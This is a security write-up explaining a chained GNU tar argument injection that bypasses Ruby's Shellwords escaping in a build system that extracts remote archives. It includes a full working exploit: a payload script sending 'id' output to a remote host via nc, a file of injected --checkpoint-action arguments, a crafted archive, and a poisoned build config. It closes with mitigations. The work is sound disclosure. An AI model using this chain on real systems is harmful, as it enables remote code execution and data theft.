This is a short write-up about an interesting argument injection I ran into a while ago. There is nothing new here, but it is still worth a look: argument injection is an often-overlooked attack avenue, since most people go after the more traditional command injection vulnerabilities.

What is argument injection?

Very similar to command injection, argument injection occurs when attacker-controlled values are passed into a shell function without adequate sanitization. This type of vulnerability is normally a little harder to exploit than command injection, as it typically requires that the command whose arguments are being injected into has one or more arguments that lead to a code path for command execution. In command injection, shell control characters are used to “escape” the current command or to inject additional commands; these, as we know, are [;`"'|&${}]. With argument injection the attacker-controlled value needs to start with - or -- (not always, but this is the most common form). Another form is wildcard injection, which leads to argument injection. The best known example of this is the tar command, where the * wildcard is used to trick tar into reading filenames as arguments.

Some recent examples of argument injection to code execution:

The vulnerability

While looking at a system that processed user-supplied files, I noticed some code that shells out to an external command. The system would first clone a git repository (or download an archive) and then check whether the downloaded folder contained a specific file. If that file existed, it contained a list of additional external files to download. The file looked similar to this:

name = "mybuilder"

[[externalPacks]]
  url = "http://remoteserver/tark.tar"
  dir = "."
  files = ["file1","file2","file3"]
[[externalPacks]]
  url = "http://remoteserver/tark.tar"
  dir = "."
  files = []

As can be seen, one or more external archive locations can be included. The option also exists to specify that only certain files from those archives should be extracted.

The code routine that did this extraction was written in Ruby and resembled this:

command = "tar  -C \"#{Shellwords.escape destination}\" -xvzf \"#{Shellwords.escape tgzfile}\" "

# Append each user-supplied file name as a further argument to tar
extractFiles.each do |f|
  command << " \"#{Shellwords.escape f}\""
end

Here is a modified version that takes its arguments from the command line, which makes local testing easier:

require 'shellwords'

destination =  ARGV[0]
tgzfile =  ARGV[1]

command = "tar  -C \"#{Shellwords.escape destination}\" -xvzf \"#{Shellwords.escape tgzfile}\" "

ARGV[2..-1].each do |f|
  command << " \"#{Shellwords.escape f}\""
end
puts command

# Run the command, capturing stderr together with stdout
out = `#{command} 2>&1`

unless $?.success?
  error = "Error running a shell command\n"
  error << "$ #{command}\n"
  error << out

  raise error
end
puts out

In this case the vulnerability happened to be in a code routine that shells out to tar; however, unlike the well-known wildcard example mentioned earlier, wildcards didn’t work. This is because the developers had taken the possibility of command injection into account and used the Ruby Shellwords module to escape the user-supplied values. If you look at the source code for this module, you will note that almost all characters are escaped when Shellwords.escape or shellescape is used. This is controlled by the str.gsub! call, which escapes any character not in the set A-Za-z0-9_\-.,:\/@\n. This includes the * and other wildcards.

 # File shellwords.rb, line 138
def shellescape(str)
  str = str.to_s

  # An empty argument will be skipped, so return empty quotes.
  return "''".dup if str.empty?

  str = str.dup

  # Treat multibyte characters as is.  It is the caller's responsibility
  # to encode the string in the right encoding for the shell
  # environment.
  str.gsub!(/([^A-Za-z0-9_\-.,:\/@\n])/, "\\\\\\1")

  # A LF cannot be escaped with a backslash because a backslash + LF
  # combo is regarded as a line continuation and simply ignored.
  str.gsub!(/\n/, "'\n'")

  return str
end

The one character that is not escaped, and which gives us argument injection, is the -. At this point the exploit path seems pretty straightforward: instead of using the * from the tar wildcard injection example, we can just supply the arguments directly as --checkpoint=1 and --checkpoint-action=ACTION. Unfortunately this doesn’t work, as the = is also escaped by Shellwords.
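A quick way to check which values pass through unchanged is to compare each candidate against its escaped form. This is only a minimal sketch: the helper name survives_escape? and the sample list are made up for illustration, and the exact set of escaped characters can differ between Ruby versions.

```ruby
require 'shellwords'

# Hypothetical helper: true when Shellwords.escape leaves the value untouched.
def survives_escape?(value)
  Shellwords.escape(value) == value
end

# Illustrative values an attacker might place in the `files` list.
samples = ['file1', '*', '-P', '--absolute-names', '--checkpoint=1', 'a b']

samples.each do |value|
  status = survives_escape?(value) ? 'unchanged' : 'escaped'
  puts "#{value.inspect} -> #{Shellwords.escape(value).inspect} (#{status})"
end
```

Anything reported as unchanged and starting with - is a candidate for argument injection.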

This means we need to find another argument or set of arguments which lead to a code path for command execution.

The exploit

The first step in figuring this out is to read the GNU Tar manual. There are actually multiple arguments that can be used:

For injection into the extract command:

  • --to-command <command>
  • --checkpoint=1 --checkpoint-action=exec=<command>
  • -T <file> or --files-from <file>, where <file> contains one of the previous injections

For injection into the create command:

  • -I=<program> or -I <program>
  • --use-compress-program=<program>

These short options also work without spaces, which can be beneficial in other cases:

  • -T<file>
  • -I"/path/to/exec"

For the exploit, the extract command is being used, so one of the injection points identified for extraction should be used. We also know that the = can’t be present, which leaves --to-command, -T and --files-from as possible argument injections.

The snag

The option to inject arguments exists, and it is possible to inject arguments that aren’t escaped in any way (no =). However, the --to-command, -T and --files-from options all require a file path that is under attacker control: we need to be able to drop a file there, either the executable for --to-command or the file list with the additional arguments for -T. The extraction code doesn’t allow us to control the destination, though; a temporary folder is created for each extraction operation. The challenge was to get around this so that we could drop a file at a path we know and control.

Fortunately we can use argument injection for this! Going through the GNU Tar manual, one argument sticks out: --absolute-names or -P. Tar usually strips leading slashes and directory traversals from the names of files in the archive. With --absolute-names, tar uses the full path stored in the archive as the path to extract to. Thus if a file has a name of /tmp/myfile, tar will extract it to /tmp/myfile instead of /<extract-destination>/tmp/myfile.
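The effect of -P on the extraction path can be pictured with a toy model. This is not tar's actual logic (it ignores directory traversal handling, for instance), and both extraction_target and the /build/tmp123 destination are made up for illustration.

```ruby
# Toy model only: where a member with a leading slash ends up,
# with and without --absolute-names (-P).
def extraction_target(destination, member, absolute_names: false)
  # With -P the stored absolute path is used as-is.
  return member if absolute_names && member.start_with?('/')

  # Otherwise leading slashes are dropped and the member lands under destination.
  File.join(destination, member.sub(%r{\A/+}, ''))
end

puts extraction_target('/build/tmp123', '/tmp/myfile')
puts extraction_target('/build/tmp123', '/tmp/myfile', absolute_names: true)
```

The first call stays inside the temporary folder; the second escapes it, which is what gives us a known, controlled path.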

Building the exploit

Now with the snag taken care of, a full exploit chain can be put together. The command execution file is created:

cat > /tmp/p <<EOF
# insert your bad command here
id | nc remoteserver 443
EOF
chmod +x /tmp/p

Then the argument injection file to call the exploit:

cat > /tmp/xx <<EOF
--checkpoint=1
--checkpoint-action="exec=sh /tmp/p"
EOF

These are put into an archive:

tar cvzf blah.tgz -P /tmp/p /tmp/xx

tar tvf blah.tgz 
tar: Removing leading `/' from member names
-rw-r--r-- staaldraad/staaldraad 0 2019-11-24 13:36 /tmp/p
-rw-r--r-- staaldraad/staaldraad 0 2019-11-24 13:36 /tmp/xx

The archive is hosted remotely and the build file is updated to download this file, and some argument injection is added:

name = "mybuilder"

[[externalPacks]]
  url = "http://remoteserver/blah.tgz"
  dir = "."
  files = ["-P"]
[[externalPacks]]
  url = "http://remoteserver/blah.tgz"
  dir = "."
  files = ["-P","-T","/tmp/xx"]

When the buildfiles.toml is parsed, blah.tgz is downloaded and extracted. Because the files parameter is polluted with the -P tar option, it is passed to tar as a command-line argument. This results in the contents being extracted to /tmp/xx and /tmp/p respectively, ensuring we have full control of those file paths, which is required for the next step.

The second externalPacks directive is parsed and the tar file is downloaded again; this time the values -T and /tmp/xx are passed to tar. Even though these are separate arguments, tar parses them together, since -T expects an argument. This causes tar to read the file at /tmp/xx and inject the filenames there into the command line. These are then parsed as arguments, --checkpoint=1 and --checkpoint-action respectively. The checkpoint action causes a command to be executed every time a checkpoint is hit, in this case the script at /tmp/p.
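To see how the polluted files values end up as separate words, the command can be rebuilt the same way as the routine shown earlier and then split with Shellwords.split. This is a sketch: build_command is a made-up wrapper around the original string building, and Shellwords.split only approximates what a real shell would hand to tar.

```ruby
require 'shellwords'

# Hypothetical wrapper that mirrors the string building of the original routine.
def build_command(destination, tgzfile, files)
  command = "tar  -C \"#{Shellwords.escape destination}\" -xvzf \"#{Shellwords.escape tgzfile}\" "
  files.each { |f| command << " \"#{Shellwords.escape f}\"" }
  command
end

# The two `files` lists from the build file above.
[['-P'], ['-P', '-T', '/tmp/xx']].each do |files|
  command = build_command('destination', 'blah.tgz', files)
  puts command
  # Approximation of the argv tar would receive after shell word splitting.
  p Shellwords.split(command)
end
```

The quotes around each value are consumed by the shell, so tar sees -P, -T and /tmp/xx as ordinary, unquoted arguments.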

The two argument injections we get look like this:

tar -C "destination" -xvzf "blah.tgz" -P


tar -C "destination" -xvzf "blah.tgz" -P -T /tmp/xx

and finally the above gets “updated” by tar to give us the effective command line of

tar -C "destination" -xvzf "blah.tgz" -P -T /tmp/xx --checkpoint=1 --checkpoint-action="exec=sh /tmp/p"
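The “update” step can be pictured with a deliberately simplified model in which every line of the file named after -T is appended as one more argument. This is not tar's real parser, and expand_files_from is a made-up name. The point is only that nothing in this step passes through Shellwords.

```ruby
require 'tempfile'

# Simplified model: after "-T FILE", append each non-empty line of FILE
# as an additional argument. No shell escaping is applied to these lines.
def expand_files_from(argv)
  expanded = []
  args = argv.dup
  until args.empty?
    arg = args.shift
    expanded << arg
    next unless arg == '-T' && !args.empty?

    list_path = args.shift
    expanded << list_path
    File.readlines(list_path, chomp: true).each do |line|
      expanded << line unless line.empty?
    end
  end
  expanded
end

# Stand-in for /tmp/xx, written to a temporary file for the demonstration.
Tempfile.create('xx') do |list|
  list.puts '--checkpoint=1'
  list.puts '--checkpoint-action="exec=sh /tmp/p"'
  list.flush
  p expand_files_from(['tar', '-xvzf', 'blah.tgz', '-P', '-T', list.path])
end
```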

A nice chain of argument injections leading to command execution. The --to-command option could also have been considered, but because of the space in the argument (--to-command "/path"), the injection fails as the space is escaped by Shellwords. With the -T route, the final command line is assembled by tar after Shellwords.escape has already run, so no characters are escaped.


In the end the original code was trying to do the right thing by escaping user-supplied data; unfortunately the escaping didn’t cover the -, since this isn’t typically seen as an injection character (and is pretty common in file names). Fortunately tar provides a number of paths to code execution, and by chaining multiple argument injections together it was possible to get command execution. The fix here was to add an additional check that discards any user-supplied filename starting with -. An alternative would be to use -- in the command, as most Linux commands now support this to indicate that the values that follow should not be treated as arguments, for example:

rm -- <user-path> <user-path2>

If the user-supplied paths are -rf and /, this will try to remove files named -rf and / instead of treating them as the dreaded rm -rf / injection.
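Both mitigations can be combined in a few lines of Ruby. The following is a sketch rather than the fix that was actually deployed: tar_extract_argv is a made-up name, it rejects the whole request instead of silently discarding a filename, and it assumes destination and tgzfile are not attacker controlled.

```ruby
# Hypothetical helper: builds an argv array for tar instead of a shell string.
def tar_extract_argv(destination, tgzfile, files)
  # Reject any user-supplied name that tar could mistake for an option.
  bad = files.find { |f| f.start_with?('-') }
  raise ArgumentError, "refusing option-like filename: #{bad}" if bad

  # "--" marks the end of options; everything after it is a member name.
  ['tar', '-C', destination, '-xvzf', tgzfile, '--', *files]
end

argv = tar_extract_argv('destination', 'blah.tgz', %w[file1 file2])
p argv

begin
  tar_extract_argv('destination', 'blah.tgz', ['-P', '-T', '/tmp/xx'])
rescue ArgumentError => e
  puts "rejected: #{e.message}"
end
```

Passing the resulting array to system(*argv) or Open3.capture2e(*argv) also avoids the shell altogether, so no escaping is needed for the remaining values.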

Although there is nothing new in this work, it is a good reminder that argument injection should always be considered when evaluating code.